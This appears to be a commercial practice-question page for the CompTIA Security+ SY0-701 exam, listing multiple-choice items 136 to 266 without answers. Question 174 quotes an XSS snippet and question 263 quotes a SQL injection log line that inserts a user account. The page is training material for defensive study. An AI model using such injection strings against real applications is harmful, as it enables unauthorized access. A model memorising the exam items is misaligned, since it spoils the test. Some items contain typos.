A company processes a large volume of business-to-business transactions and prioritizes data confidentiality over transaction availability. The company’s firewall administrator must configure a new hardware-based firewall to replace the current one. Which of the following should the administrator do to best align with the company requirements in case a security event occurs?

Options:

A.

Ensure the firewall data plane moves to fail-closed mode.

B.

Implement a deny-all rule as the last firewall ACL rule.

C.

Prioritize business-critical application traffic through the firewall.

D.

Configure rate limiting between the firewall interfaces.

Buy Now
Questions 136

An administrator is estimating the cost associated with an attack that could result in the replacement of a physical server. Which of the following processes is the administrator performing?

Options:

A.

Quantitative risk analysis

B.

Disaster recovery test

C.

Physical security controls review

D.

Threat modeling

Buy Now
Questions 137

Which of the following cryptographic methods is preferred for securing communications with limited computing resources?

Options:

A.

Hashing algorithm

B.

Public key infrastructure

C.

Symmetric encryption

D.

Elliptic curve cryptography

Buy Now
Questions 138

A growing company would like to enhance the ability of its security operations center to detect threats but reduce the amount of manual work required tor the security analysts. Which of the following would best enable the reduction in manual work?

Options:

A.

SOAR

B.

SIEM

C.

MDM

D.

DLP

Buy Now
Questions 139

A penetration tester visits a client’s website and downloads the site ' s content. Which of the following actions is the penetration tester performing?

Options:

A.

Unknown environment testing

B.

Vulnerability scan

C.

Due diligence

D.

Passive reconnaissance

Buy Now
Questions 140

Which of the following allows a systems administrator to tune permissions for a file?

Options:

A.

Patching

B.

Access control list

C.

Configuration enforcement

D.

Least privilege

Buy Now
Questions 141

A company wants to track modifications to the code used to build new virtual servers. Which of the following will the company most likely deploy?

Options:

A.

Change management ticketing system

B.

Behavioral analyzer

C.

Collaboration platform

D.

Version control tool

Buy Now
Questions 142

A systems administrator wants to use a technical solution to explicitly define file permissions for the entire team. Which of the following should the administrator implement?

Options:

A.

ACL

B.

Monitoring

C.

Isolation

D.

HIPS

Buy Now
Questions 143

Users at a company are reporting they are unable to access the URL for a new retail website because it is flagged as gambling and is being blocked.

Which of the following changes would allow users to access the site?

Options:

A.

Creating a firewall rule to allow HTTPS traffic

B.

Configuring the IPS to allow shopping

C.

Tuning the DLP rule that detects credit card data

D.

Updating the categorization in the content filter

Buy Now
Questions 144

A company is concerned with supply chain compromise of new servers and wants to limit this risk. Which of the following should the company review first?

Options:

A.

Sanitization procedure

B.

Acquisition process

C.

Change management

D.

Asset tracking

Buy Now
Questions 145

A security team is reviewing the findings in a report that was delivered after a third party performed a penetration test. One of the findings indicated that a web application form field is vulnerable to cross-site scripting. Which of the following application security techniques should the security analyst recommend the developer implement to prevent this vulnerability?

Options:

A.

Secure cookies

B.

Version control

C.

Input validation

D.

Code signing

Buy Now
Questions 146

Which of the following actions would reduce the number of false positives for an analyst to manually review?

Options:

A.

Create playbooks as part of a SOAR platform

B.

Redefine the patch management process

C.

Replace an EDR tool with an XDR solution

D.

Disable AV heuristics scanning

Buy Now
Questions 147

A software developer released a new application and is distributing application files via the developer’s website. Which of the following should the developer post on the website to allow users to verify the integrity of the downloaded files?

Options:

A.

Hashes

B.

Certificates

C.

Algorithms

D.

Salting

Buy Now
Questions 148

An organization has recently decided to implement SSO. The requirements are to leverage access tokens and focus on application authorization rather than user authentication. Which of the following solutions would the engineering team most likely configure?

Options:

A.

LDAP

B.

Federation

C.

SAML

D.

OAuth

Buy Now
Questions 149

During an investigation, a security analyst discovers traffic going out to a command-and-control server. The analyst must find out if any data exfiltration has occurred. Which of the following would best help the analyst determine this?

Options:

A.

Application log

B.

Metadata

C.

Network log

D.

Packet capture

Buy Now
Questions 150

An administrator notices that several users are logging in from suspicious IP addresses. After speaking with the users, the administrator determines that the employees were not logging in from those IP addresses and resets the affected users’ passwords. Which of the following should the administrator implement to prevent this type of attack from succeeding in the future?

Options:

A.

Multifactor authentication

B.

Permissions assignment

C.

Access management

D.

Password complexity

Buy Now
Questions 151

A company prepares for an upcoming regulatory audit. The company wants to perform a gap analysis in the most cost-effective way. Which of the following will help the company achieve this goal?

Options:

A.

Internal self-assessment

B.

Active reconnaissance

C.

Red team penetration test

D.

Tabletop exercise

Buy Now
Questions 152

In an effort to reduce costs, a company is implementing a strategy that gives employees access to internal company resources, including email, from personal devices. Which of the following strategies is the company implementing?

Options:

A.

CYOD

B.

BYOD

C.

COPE

D.

MDM

Buy Now
Questions 153

Which of the following would most likely be used by attackers to perform credential harvesting?

Options:

A.

Social engineering

B.

Supply chain compromise

C.

Third-party software

D.

Rainbow table

Buy Now
Questions 154

Which of the following is used to validate a certificate when it is presented to a user?

Options:

A.

OCSP

B.

CSR

C.

CA

D.

CRC

Buy Now
Questions 155

Visitors to a secured facility are required to check in with a photo ID and enter the facility through an access control vestibule Which of the following but describes this form of security control?

Options:

A.

Physical

B.

Managerial

C.

Technical

D.

Operational

Buy Now
Questions 156

An organization’s internet-facing website was compromised when an attacker exploited a buffer overflow. Which of the following should the organization deploy to best protect against similar attacks in the future?

Options:

A.

NGFW

B.

WAF

C.

TLS

D.

SD-WAN

Buy Now
Questions 157

Which of the following is a primary security concern for a company setting up a BYOD program?

Options:

A.

End of life

B.

Buffer overflow

C.

VM escape

D.

Jailbreaking

Buy Now
Questions 158

Which of the following is a directive managerial control?

Options:

A.

Acceptable use policy

B.

Login warning banner

C.

Master service agreement

D.

No trespassing sign

Buy Now
Questions 159

After a security incident, a systems administrator asks the company to buy a NAC platform. Which of the following attack surfaces is the systems administrator trying to protect?

Options:

A.

Bluetooth

B.

Wired

C.

NFC

D.

SCADA

Buy Now
Questions 160

An organization issued new laptops to all employees and wants to provide web filtering both in and out of the office without configuring additional access to the network. Which of the following types of web filtering should a systems administrator configure?

Options:

A.

Agent-based

B.

Centralized proxy

C.

URL scanning

D.

Content categorization

Buy Now
Questions 161

A new corporate policy requires all staff to use multifactor authentication to access company resources. Which of the following can be utilized to set up this form of identity and access management? (Select two)

Options:

A.

Authentication tokens

B.

Least privilege

C.

Biometrics

D.

LDAP

E.

Password vaulting

F.

SAML

Buy Now
Questions 162

An administrator assists the legal and compliance team with ensuring information about customer transactions is archived for the proper time period. Which of the following data policies is the administrator carrying out?

Options:

A.

Compromise

B.

Retention

C.

Analysis

D.

Transfer

E.

Inventory

Buy Now
Questions 163

A company plans to secure its systems by:

Preventing users from sending sensitive data over corporate email

Restricting access to potentially harmful websites

Which of the following features should the company set up? (Select two).

Options:

A.

DLP software

B.

DNS filtering

C.

File integrity monitoring

D.

Stateful firewall

E.

Guardralls

F.

Antivirus signatures

Buy Now
Questions 164

A company has a website in a server cluster. One server is experiencing very high usage, while others are nearly unused. Which of the following should the company configure to help distribute traffic quickly?

Options:

A.

Server multiprocessing

B.

Warm site

C.

Load balancer

D.

Proxy server

Buy Now
Questions 165

An organization discovers that its cold site does not have enough storage and computers available. Which of the following was most likely the cause of this failure?

Options:

A.

Capacity planning

B.

Load balancing

C.

Backups

D.

Platform diversity

Buy Now
Questions 166

A company with a high-availability website is looking to harden its controls at any cost. The company wants to ensure that the site is secure by finding any possible issues. Which of the following would most likely achieve this goal?

Options:

A.

Permission restrictions

B.

Bug bounty program

C.

Vulnerability scan

D.

Reconnaissance

Buy Now
Questions 167

A spoofed identity was detected for a digital certificate. Which of the following are the type of unidentified key and the certificate mat could be in use on the company domain?

Options:

A.

Private key and root certificate

B.

Public key and expired certificate

C.

Private key and self-signed certificate

D.

Public key and wildcard certificate

Buy Now
Questions 168

In which of the following will unencrypted PLC management traffic most likely be found?

Options:

A.

SDN

B.

IoT

C.

VPN

D.

SCADA

Buy Now
Questions 169

A bank set up a new server that contains customers ' Pll. Which of the following should the bank use to make sure the sensitive data is not modified?

Options:

A.

Full disk encryption

B.

Network access control

C.

File integrity monitoring

D.

User behavior analytics

Buy Now
Questions 170

A company is using a legacy FTP server to transfer financial data to a third party. The legacy system does not support SFTP, so a compensating control is needed to protect the sensitive, financial data in transit. Which of the following would be the most appropriate for the company to use?

Options:

A.

Telnet connection

B.

SSH tunneling

C.

Patch installation

D.

Full disk encryption

Buy Now
Questions 171

A company processes personal data from customers in multiple countries. Which of the following actions is most critical for maintaining legal compliance with global privacy regulations?

Options:

A.

Storing all customer data on encrypted local servers

B.

Hiring a data privacy officer to review contracts

C.

Ensuring DPAs are in place with third-party vendors

D.

Using strong passwords and firewalls on all endpoints

Buy Now
Questions 172

A few weeks after deploying additional email servers, a company begins to receive complaints that messages are going into recipients’ spam folders. Which of the following needs to be updated?

Options:

A.

CNAME

B.

SMTP

C.

DLP

D.

SPF

Buy Now
Questions 173

Which of the following is the best way to improve the confidentiality of remote connections to an enterprise ' s infrastructure?

Options:

A.

Firewalls

B.

Virtual private networks

C.

Extensive logging

D.

Intrusion detection systems

Buy Now
Questions 174

While reviewing logs, a security administrator identifies the following code:

< script > function(send_info) < /script >

Which of the following best describes the vulnerability being exploited?

Options:

A.

XSS

B.

SQLi

C.

DDoS

D.

CSRF

Buy Now
Questions 175

Which of the following describes when a user installs an unauthorized application by bypassing the authorized application store and installing a binary file?

Options:

A.

Jailbreaking

B.

Sideloading

C.

Memory injection

D.

VM escaping

Buy Now
Questions 176

A security team created a document that details the order in which critical systems should be through back online after a major outage. Which of the following documents did the team create?

Options:

A.

Communication plan

B.

Incident response plan

C.

Data retention policy

D.

Disaster recovery plan

Buy Now
Questions 177

A company uses its backups to recover from a ransomware attack. Which of the following best guarantees that the backups are not infected?

Options:

A.

Immutability

B.

Destruction

C.

Sanitization

D.

Retention

Buy Now
Questions 178

Which of the following is most likely to cause reputational damage to a company?

Options:

A.

Open ports

B.

Low availability

C.

Unpatched vulnerabilities

D.

Data leaks

Buy Now
Questions 179

Which of the following activities uses OSINT?

Options:

A.

Social engineering testing

B.

Data analysis of logs

C.

Collecting evidence of malicious activity

D.

Producing IOC for malicious artifacts

Buy Now
Questions 180

An organization disabled unneeded services and placed a firewall in front of a business-critical legacy system. Which of the following best describes the actions taken by the organization?

Options:

A.

Exception

B.

Segmentation

C.

Risk transfer

D.

Compensating controls

Buy Now
Questions 181

Which of the following incident response activities ensures evidence is properly handied?

Options:

A.

E-discovery

B.

Chain of custody

C.

Legal hold

D.

Preservation

Buy Now
Questions 182

Which of the following consequences would a retail chain most likely face from customers in the event the retailer is non-compliant with PCI DSS?

Options:

A.

Contractual impacts

B.

Sanctions

C.

Fines

D.

Reputational damage

Buy Now
Questions 183

Employees located off-site must have access to company resources in order to complete their assigned tasks These employees utilize a solution that allows remote access without interception concerns. Which of the following best describes this solution?

Options:

A.

Proxy server

B.

NGFW

C.

VPN

D.

Security zone

Buy Now
Questions 184

Which of the following technologies can achieve microsegmentation?

Options:

A.

Next-generation firewalls

B.

Software-defined networking

C.

Embedded systems

D.

Air-gapped

Buy Now
Questions 185

A technician needs to apply a high-priority patch to a production system. Which of the following steps should be taken first?

Options:

A.

Air gap the system.

B.

Move the system to a different network segment.

C.

Create a change control request.

D.

Apply the patch to the system.

Buy Now
Questions 186

Executives at a company are concerned about employees accessing systems and information about sensitive company projects unrelated to the employees ' normal job duties. Which of the following enterprise security capabilities will the security team most likely deploy to detect that activity?

Options:

A.

UBA

B.

EDR

C.

NAC

D.

DLP

Buy Now
Questions 187

Which of the following is most likely associated with introducing vulnerabilities on a corporate network by the deployment of unapproved software?

Options:

A.

Hacktivists

B.

Script kiddies

C.

Competitors

D.

Shadow IT

Buy Now
Questions 188

Which of the following actions best addresses a vulnerability found on a company ' s web server?

Options:

A.

Patching

B.

Segmentation

C.

Decommissioning

D.

Monitoring

Buy Now
Questions 189

Which of the following is die most important security concern when using legacy systems to provide production service?

Options:

A.

Instability

B.

Lack of vendor support

C.

Loss of availability

D.

Use of insecure protocols

Buy Now
Questions 190

Which of the following is the phase in the incident response process when a security analyst reviews roles and responsibilities?

Options:

A.

Preparation

B.

Recovery

C.

Lessons learned

D.

Analysis

Buy Now
Questions 191

An administrator is creating a secure method for a contractor to access a test environment. Which of the following would provide the contractor with the best access to the test environment?

Options:

A.

Application server

B.

Jump server

C.

RDP server

D.

Proxy server

Buy Now
Questions 192

An organization experiences a cybersecurity incident involving a command-and-control server. Which of the following logs should be analyzed to identify the impacted host? (Select two).

Options:

A.

Application

B.

Authentication

C.

DHCP

D.

Network

E.

Firewall

F.

Database

Buy Now
Questions 193

Which of the following methods will most likely be used to identify legacy systems?

Options:

A.

Bug bounty program

B.

Vulnerability scan

C.

Package monitoring

D.

Dynamic analysis

Buy Now
Questions 194

A systems administrator notices that one of the systems critical for processing customer transactions is running an end-of-life operating system. Which of the following techniques would increase enterprise security?

Options:

A.

Installing HIDS on the system

B.

Placing the system in an isolated VLAN

C.

Decommissioning the system

D.

Encrypting the system ' s hard drive

Buy Now
Questions 195

A company is currently utilizing usernames and passwords, and it wants to integrate an MFA method that is seamless, can Integrate easily into a user ' s workflow, and can utilize employee-owned devices. Which of the following will meet these requirements?

Options:

A.

Push notifications

B.

Phone call

C.

Smart card

D.

Offline backup codes

Buy Now
Questions 196

Security controls in a data center are being reviewed to ensure data is properly protected and that human life considerations are included. Which of the following best describes how the controls should be set up?

Options:

A.

Remote access points should fail closed.

B.

Logging controls should fail open.

C.

Safety controls should fail open.

D.

Logical security controls should fail closed.

Buy Now
Questions 197

An administrator was notified that a user logged in remotely after hours and copied large amounts of data to a personal device.

Which of the following best describes the user’s activity?

Options:

A.

Penetration testing

B.

Phishing campaign

C.

External audit

D.

Insider threat

Buy Now
Questions 198

Which of the following is a vulnerability concern for end-of-life hardware?

Options:

A.

Failure to follow hardware disposal procedures could result in unintended data release.

B.

The supply chain may not have replacement hardware.

C.

Newly released software may require computing resources not available on legacy hardware.

D.

The vendor may stop providing patches and updates.

Buy Now
Questions 199

Which of the following would best explain why a security analyst is running daily vulnerability scans on all corporate endpoints?

Options:

A.

To track the status of patch installations

B.

To find shadow IT cloud deployments

C.

To continuously monitor hardware inventory

D.

To hunt for active attackers in the network

Buy Now
Questions 200

During an investigation, an incident response team attempts to understand the source of an incident. Which of the following incident response activities describes this process?

Options:

A.

Analysis

B.

Lessons learned

C.

Detection

D.

Containment

Buy Now
Questions 201

The Chief Information Security Officer of an organization needs to ensure recovery from ransomware would likely occur within the organization ' s agreed-upon RPOs end RTOs. Which of the following backup scenarios would best ensure recovery?

Options:

A.

Hourly differential backups stored on a local SAN array

B.

Dally full backups stored on premises in magnetic offline media

C.

Daly differential backups maintained by a third-party cloud provider

D.

Weekly full backups with daily incremental stored on a NAS drive

Buy Now
Questions 202

Which of the following scenarios describes a possible business email compromise attack?

Options:

A.

An employee receives a gift card request in an email that has an executive ' s name in the display field of the email.

B.

Employees who open an email attachment receive messages demanding payment in order to access files.

C.

A service desk employee receives an email from the HR director asking for log-in credentials to a cloud administrator account.

D.

An employee receives an email with a link to a phishing site that is designed to look like the company ' s email portal.

Buy Now
Questions 203

A company installed cameras and added signs to alert visitors that they are being recorded. Which of the following controls did the company implement? (Select two).

Options:

A.

Directive

B.

Deterrent

C.

Preventive

D.

Detective

E.

Corrective

F.

Technical

Buy Now
Questions 204

A software developer released a new application and is distributing the application files through the developer’s website. Which of the following should the developer post on the website to allow users to verify the integrity of the downloaded files?

Options:

A.

Hashes

B.

Certificates

C.

Algorithms

D.

Salting

Buy Now
Questions 205

A small business initially plans to open common communications ports (21, 22, 25, 80, 443) on its firewall to allow broad access to its screened subnet. However, their security consultant advises against this action. Which of the following security principles is the consultant addressing?

Options:

A.

Secure access service edge

B.

Attack surface

C.

Least privilege

D.

Separation of duties

Buy Now
Questions 206

Which of the following best represents how frequently an incident is expected to happen each year?

Options:

A.

RTO

B.

ALE

C.

SLE

D.

ARO

Buy Now
Questions 207

Which of the following can be used to identify potential attacker activities without affecting production servers?

Options:

A.

Honey pot

B.

Video surveillance

C.

Zero Trust

D.

Geofencing

Buy Now
Questions 208

A security analyst must identify abnormal behavior on the server. Which of the following does the analyst most likely need to do?

Options:

A.

Disable unnecessary ports.

B.

Patch the system.

C.

Establish baselines.

D.

Perform alert tuning.

Buy Now
Questions 209

Which of the following is a hardware-specific vulnerability?

Options:

A.

Firmware version

B.

Buffer overflow

C.

SQL injection

D.

Cross-site scripting

Buy Now
Questions 210

Which of the following security principles most likely requires validation before allowing traffic between systems?

Options:

A.

Policy enforcement

B.

Authentication

C.

Zero Trust architecture

D.

Confidentiality

Buy Now
Questions 211

A company evaluates several options that would allow employees to have remote access to the network. The security team wants to ensure the solution includes AAA to comply with internal security policies. Which of the following should the security team recommend?

Options:

A.

IPSec with RADIUS

B.

RDP connection with LDAPS

C.

Web proxy for all remote traffic

D.

Jump server with 802.1X

Buy Now
Questions 212

Which of the following best summarizes the reason for an AUP?

Options:

A.

To provide a framework for performing a security assessment

B.

To provide guidance regarding the permitted operations of a system

C.

To provide procedures for restoring a resource in the event of an incident

D.

To provide an agreement between a vendor and service provider

Buy Now
Questions 213

Which of the following threat actors would most likely target an organization by using a logic bomb within an internally-developed application?

Options:

A.

Nation-state

B.

Trusted insider

C.

Organized crime group

D.

Hacktivist

Buy Now
Questions 214

An engineer needs to ensure that a script has not been modified before it is launched. Which of the following best provides this functionality?

Options:

A.

Masking

B.

Obfuscation

C.

Hashing

D.

Encryption

Buy Now
Questions 215

An employee receives a text message from an unknown number claiming to be the company ' s Chief Executive Officer and asking the employee to purchase several gift cards. Which of the following types of attacks does this describe?

Options:

A.

Vishing

B.

Smishing

C.

Pretexting

D.

Phishing

Buy Now
Questions 216

An employee fell for a phishing scam, which allowed an attacker to gain access to a company PC. The attacker scraped the PC’s memory to find other credentials. Without cracking these credentials, the attacker used them to move laterally through the corporate network. Which of the following describes this type of attack?

Options:

A.

Privilege escalation

B.

Buffer overflow

C.

SQL injection

D.

Pass-the-hash

Buy Now
Questions 217

Which of the following explains how to determine the global regulations that data is subject to regardless of the country where the data is stored?

Options:

A.

Geographic dispersion

B.

Data sovereignty

C.

Geographic restrictions

D.

Data segmentation

Buy Now
Questions 218

A security analyst is creating base for the server team to follow when hardening new devices for deployment. Which of the following beet describes what the analyst is creating?

Options:

A.

Change management procedure

B.

Information security policy

C.

Cybersecurity framework

D.

Secure configuration guide

Buy Now
Questions 219

A security analyst learns that an attack vector, which was used as a part of a recent incident, was a well-known IoT device exploit. The analyst needs to review logs to identify the time of initial exploit. Which of the following logs should the analyst review first?

Options:

A.

Wireless access point

B.

Switch

C.

Firewall

D.

NAC

Buy Now
Questions 220

Which of the following phases of the incident response process attempts to minimize disruption?

Options:

A.

Recovery

B.

Containment

C.

Preparation

D.

Analysis

Buy Now
Questions 221

A security analyst is examining a penetration test report and notices that the tester pivoted to critical internal systems with the same local user ID and password. Which of the following would help prevent this in the future?

Options:

A.

Implement centralized authentication with proper password policies

B.

Add password complexity rules and increase password history limits

C.

Connect the systems to an external authentication server

D.

Limit the ability of user accounts to change passwords

Buy Now
Questions 222

An employee receives a text message that appears to have been sent by the payroll department and is asking for credential verification. Which of the following social engineering techniques are being attempted? (Choose two.)

Options:

A.

Typosquatting

B.

Phishing

C.

Impersonation

D.

Vishing

E.

Smishing

F.

Misinformation

Buy Now
Questions 223

Which of the following is the best way to prevent an unauthorized user from plugging a laptop into an employee ' s phone network port and then using tools to scan for database servers?

Options:

A.

MAC filtering

B.

Segmentation

C.

Certification

D.

Isolation

Buy Now
Questions 224

Which of the following types of vulnerabilities involves attacking a system to access adjacent hosts?

Options:

A.

VM escape

B.

Side loading

C.

Remote code execution

D.

Resource exhaustion

Buy Now
Questions 225

A company has begun labeling all laptops with asset inventory stickers and associating them with employee IDs. Which of the following security benefits do these actions provide? (Choose two.)

Options:

A.

If a security incident occurs on the device, the correct employee can be notified.

B.

The security team will be able to send user awareness training to the appropriate device.

C.

Users can be mapped to their devices when configuring software MFA tokens.

D.

User-based firewall policies can be correctly targeted to the appropriate laptops.

E.

When conducting penetration testing, the security team will be able to target the desired laptops.

F.

Company data can be accounted for when the employee leaves the organization.

Buy Now
Questions 226

A penetration tester was able to gain unauthorized access to a hypervisor platform. Which of the following vulnerabilities was most likely exploited?

Options:

A.

Cross-site scripting

B.

SQL injection

C.

Race condition

D.

VM escape

Buy Now
Questions 227

A company is required to use certified hardware when building networks. Which of the following best addresses the risks associated with procuring counterfeit hardware?

Options:

A.

A thorough analysis of the supply chain

B.

A legally enforceable corporate acquisition policy

C.

A right to audit clause in vendor contracts and SOWs

D.

An in-depth penetration test of all suppliers and vendors

Buy Now
Questions 228

The executive management team is mandating the company develop a disaster recovery plan. The cost must be kept to a minimum, and the money to fund additional internet connections is not available. Which of the following would be the best option?

Options:

A.

Hot site

B.

Cold site

C.

Failover site

D.

Warm site

Buy Now
Questions 229

An unexpected and out-of-character email message from a Chief Executive Officer’s corporate account asked an employee to provide financial information and to change the recipient ' s contact number. Which of the following attack vectors is most likely being used?

Options:

A.

Business email compromise

B.

Phishing

C.

Brand impersonation

D.

Pretexting

Buy Now
Questions 230

Which of the following is a use of CVSS?

Options:

A.

To determine the cost associated with patching systems

B.

To identify unused ports and services that should be closed

C.

To analyze code for defects that could be exploited

D.

To prioritize the remediation of vulnerabilities

Buy Now
Questions 231

A cyber operations team informs a security analyst about a new tactic malicious actors are using to compromise networks.

SIEM alerts have not yet been configured. Which of the following best describes what the security analyst should do to identify this behavior?

Options:

A.

[Digital forensics

B.

E-discovery

C.

Incident response

D.

Threat hunting

Buy Now
Questions 232

You are security administrator investigating a potential infection on a network.

Click on each host and firewall. Review all logs to determine which host originated the Infecton and then deny each remaining hosts clean or infected.

Options:

Buy Now
Questions 233

An employee asks a security analyst to scan a suspicious email that contains a link to a file on a file-sharing site. The analyst determines that the file is safe after downloading and scanning the file with antivirus software. When the employee opens the file, their device is infected with ransomware. Which of the following steps should the analyst have taken?

Options:

A.

Review the file in a code editor.

B.

Monitor the file connections with netstat.

C.

Execute the file in a sandbox.

D.

Retrieve the file hash and check with OSINT.

Buy Now
Questions 234

An organization is struggling with scaling issues on its VPN concentrator and internet circuit due to remote work. The organization is looking for a software solution that will allow it to reduce traffic on the VPN and internet circuit, while still providing encrypted tunnel access to the data center and monitoring of remote employee internet traffic. Which of the following will help achieve these objectives?

Options:

A.

Deploying a SASE solution to remote employees

B.

Building a load-balanced VPN solution with redundant internet

C.

Purchasing a low-cost SD-WAN solution for VPN traffic

D.

Using a cloud provider to create additional VPN concentrators

Buy Now
Questions 235

Which of the following techniques can be used to sanitize the data contained on a hard drive while allowing for the hard drive to be repurposed?

Options:

A.

Degaussing

B.

Drive shredder

C.

Retention platform

D.

Wipe tool

Buy Now
Questions 236

A security analyst has determined that a security breach would have a financial impact of $15,000 and is expected to occur twice within a three-year period. Which of the following is the ALE for this risk?

Options:

A.

$7,500

B.

$10,000

C.

$15,000

D.

$30,000

Buy Now
Questions 237

A financial institution would like to store its customer data m the cloud but still allow the data to be accessed and manipulated while encrypted. Doing so would prevent the cloud service provider from being able to decipher the data due to its sensitivity. The financial institution Is not concerned about computational overheads and slow speeds. Which of the following cryptographic techniques would best meet the requirement?

Options:

A.

Asymmetric

B.

Symmetric

C.

Homomorphic

D.

Ephemeral

Buy Now
Questions 238

Which of the following threat vectors is most commonly utilized by insider threat actors attempting data exfiltration?

Options:

A.

Unidentified removable devices

B.

Default network device credentials

C.

Spear phishing emails

D.

Impersonation of business units through typosquatting

Buy Now
Questions 239

The number of tickets the help desk has been receiving has increased recently due to numerous false-positive phishing reports. Which of the following would be best to help to reduce the false positives?

Options:

A.

Performing more phishing simulation campaigns

B.

Improving security awareness training

C.

Hiring more help desk staff

D.

Implementing an incident reporting web page

Buy Now
Questions 240

The management team wants to assess the cybersecurity team ' s readiness to respond to a threat scenario. Which of the following will adequately assess and formalize a response within a short time?

Options:

A.

Send a message to all IT managers and request formal action plans.

B.

Create a bug bounty program and assess the findings.

C.

Execute a tabletop exercise and document the performance results.

D.

Hire an external consultant to independently assess the cybersecurity processes.

Buy Now
Questions 241

Which of the following would best allow a company to prevent access to systems from the Internet?

Options:

A.

Containerization

B.

Virtualization

C.

SD-WAN

D.

Air-gapped

Buy Now
Questions 242

During a routine audit, an analyst discovers that a department at a high school uses a simul-ation program that was not properly vetted before deployment.

Which of the following threats is this an example of?

Options:

A.

Espionage

B.

Data exfiltration

C.

Shadow IT

D.

Zero-day

Buy Now
Questions 243

Which of the following is the most important element when defining effective security governance?

Options:

A.

Discovering and documenting external considerations

B.

Developing procedures for employee onboarding and offboarding

C.

Assigning roles and responsibilities for owners, controllers, and custodians

D.

Defining and monitoring change management procedures

Buy Now
Questions 244

An organization with multiple geographic locations has invested in various internet circuits at each location, including MPLS, 4G/5G, broadband, and dial-up. An architect is configuring a solution that will allow locations to function consistently and leverage links based on specific criteria. Which of the following is the best solution for the architect to configure?

Options:

A.

SD-WAN

B.

UTM

C.

VPN

D.

SASE

Buy Now
Questions 245

A company deploys a new server that a client must be able to access it at all times. Which of the following will support this availability requirement?

Options:

A.

Proxy server

B.

Jump server

C.

Geographic restrictions

D.

Load balancer

Buy Now
Questions 246

A company receives an alert that a network device vendor, which is widely used in the enterprise, has been banned by the government.

Which of the following will the company ' s general counsel most likely be concerned with during a hardware refresh of these devices?

Options:

A.

Sanctions

B.

Data sovereignty

C.

Cost of replacement

D.

Loss of license

Buy Now
Questions 247

Which of the following data types best describes an AI tool developed by a company to automate the ticketing system under a specific contract?

Options:

A.

Classified

B.

Regulated information

C.

Open source

D.

Intellectual property

Buy Now
Questions 248

Which of the following is an algorithm performed to verify that data has not been modified?

Options:

A.

Hash

B.

Code check

C.

Encryption

D.

Checksum

Buy Now
Questions 249

Which of the following activities is the first stage in the incident response process?

Options:

A.

Detection

B.

Declaration

C.

Containment

D.

Vacation

Buy Now
Questions 250

A vendor needs to remotely and securely transfer files from one server to another using the command line. Which of the following protocols should be Implemented to allow for this type of access? (Select two).

Options:

A.

SSH

B.

SNMP

C.

RDP

D.

S/MIME

E.

SMTP

F.

SFTP

Buy Now
Questions 251

Which of the following describes a security alerting and monitoring tool that collects system, application, and network logs from multiple sources in a centralized system?

Options:

A.

SIEM

B.

DLP

C.

IDS

D.

SNMP

Buy Now
Questions 252

An IT manager is increasing the security capabilities of an organization after a data classification initiative determined that sensitive data could be exfiltrated from the environment. Which of the following solutions would mitigate the risk?

Options:

A.

XDR

B.

SPF

C.

DLP

D.

DMARC

Buy Now
Questions 253

Which of the following is the most likely motivation for a company administrator to look at an employee ' s personal information in a database?

Options:

A.

Ideological differences

B.

General curiosity

C.

Gain influence

D.

Intellectual property

Buy Now
Questions 254

A security analyst wants to better understand the behavior of users and devices in order to gain visibility into potential malicious activities. The analyst needs a control to detect when actions deviate from a common baseline Which of the following should the analyst use?

Options:

A.

Intrusion prevention system

B.

Sandbox

C.

Endpoint detection and response

D.

Antivirus

Buy Now
Questions 255

An organization failed to account for the right-to-be-forgotten regulations. Which of the following impacts might this action have on the company?

Options:

A.

Fines

B.

Data breaches

C.

Revenue loss

D.

Blackmail

Buy Now
Questions 256

Which of the following roles, according to the shared responsibility model, is responsible for securing the company’s database in an IaaS model for a cloud environment?

Options:

A.

Client

B.

Third-party vendor

C.

Cloud provider

D.

DBA

Buy Now
Questions 257

A malicious update was distributed to a common software platform and disabled services at many organizations. Which of the following best describes this type of vulnerability?

Options:

A.

DDoS attack

B.

Rogue employee

C.

Insider threat

D.

Supply chain

Buy Now
Questions 258

A security analyst receives an alert that there was an attempt to download known malware. Which of the following actions would allow the best chance to analyze the malware?

Options:

A.

Review the IPS logs and determine which command-and-control IPs were blocked.

B.

Analyze application logs to see how the malware attempted to maintain persistence.

C.

Run vulnerability scans to check for systems and applications that are vulnerable to the malware.

D.

Obtain and execute the malware in a sandbox environment and perform packet captures.

Buy Now
Questions 259

A Chief Information Security Officer is developing procedures to guide detective and corrective activities associated with common threats, including phishing, social engineering, and business email compromise. Which of the following documents will be most relevant to revise as part of this process?

Options:

A.

SDLC

B.

IRP

C.

BCP

D.

AUP

Buy Now
Questions 260

Which of the following technologies assists in passively verifying the expired status of a digital certificate?

Options:

A.

OCSP

B.

CRL

C.

TPM

D.

CSR

Buy Now
Questions 261

Which of the following documents details how to accomplish a technical security task?

Options:

A.

Standard

B.

Policy

C.

Guideline

D.

Procedure

Buy Now
Questions 262

Which of the following best protects sensitive data in transit across a geographically dispersed Infrastructure?

Options:

A.

Encryption

B.

Masking

C.

Tokenization

D.

Obfuscation

Buy Now
Questions 263

While investigating a possible incident, a security analyst discovers the following log entries:

67.118.34.157 ----- [28/Jul/2022:10:26:59 -0300] " GET /query.php?q-wireless%20headphones / HTTP/1.0 " 200 12737

132.18.222.103 ----[28/Jul/2022:10:27:10 -0300] " GET /query.php?q=123 INSERT INTO users VALUES( ' temp ' , ' pass123 ' )# / HTTP/1.0 " 200 935

12.45.101.121 ----- [28/Jul/2022:10:27:22 -0300] " GET /query.php?q=mp3%20players I HTTP/1.0 " 200 14650

Which of the following should the analyst do first?

Options:

A.

Implement a WAF

B.

Disable the query .php script

C.

Block brute-force attempts on temporary users

D.

Check the users table for new accounts

Buy Now
Questions 264

A data administrator is configuring authentication for a SaaS application and would like to reduce the number of credentials employees need to maintain. The company prefers to use domain credentials to access new SaaS applications. Which of the following methods would allow this functionality?

Options:

A.

SSO

B.

LEAP

C.

MFA

D.

PEAP

Buy Now
Questions 265

A company is concerned about weather events causing damage to the server room and downtime. Which of the following should the company consider?

Options:

A.

Clustering servers

B.

Geographic dispersion

C.

Load balancers

D.

Off-site backups

Buy Now
Questions 266

A security analyst and the management team are reviewing the organizational performance of a recent phishing campaign. The user click-through rate exceeded the acceptable risk threshold, and the management team wants to reduce the impact when a user clicks on a link in a phishing message. Which of the following should the analyst do?

Options:

A.

Place posters around the office to raise awareness of common phishing activities.

B.

Implement email security filters to prevent phishing emails from being delivered

C.

Update the EDR policies to block automatic execution of downloaded programs.

D.

Create additional training for users to recognize the signs of phishing attempts.

Buy Now
Exam Code: SY0-701
Exam Name: CompTIA Security+ Exam 2026
Last Update: Jun 28, 2026
Questions: 821
SY0-701 pdf

